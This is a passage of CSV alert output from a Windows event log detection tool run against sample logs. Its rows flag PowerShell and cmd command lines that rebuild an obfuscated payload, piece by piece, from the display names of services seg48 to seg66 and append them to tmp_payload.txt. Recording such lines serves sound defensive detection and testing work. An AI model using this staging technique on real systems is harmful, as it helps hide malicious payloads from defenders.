0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:36.645 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:36.645 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:38.069 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:38.069 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:38.069 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:39.523 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:39.523 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:39.523 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:40.969 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:40.969 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:40.969 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:42.411 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:42.411 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:42.411 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:43.868 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:43.868 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:43.868 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:45.315 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:45.331 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:45.331 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:46.783 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:46.783 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:46.783 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:48.220 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:48.236 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:48.236 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:49.667 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:49.667 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:49.667 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:51.102 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:51.118 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:51.118 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:52.551 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:52.566 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:52.566 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:54.003 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:54.003 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:54.003 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:55.437 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:55.453 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:55.453 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:56.883 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:56.898 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:56.898 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:58.382 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:58.382 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:58.382 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:59.833 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:59.833 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:35:59.833 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:01.284 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:01.284 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:01.284 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:02.737 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:02.737 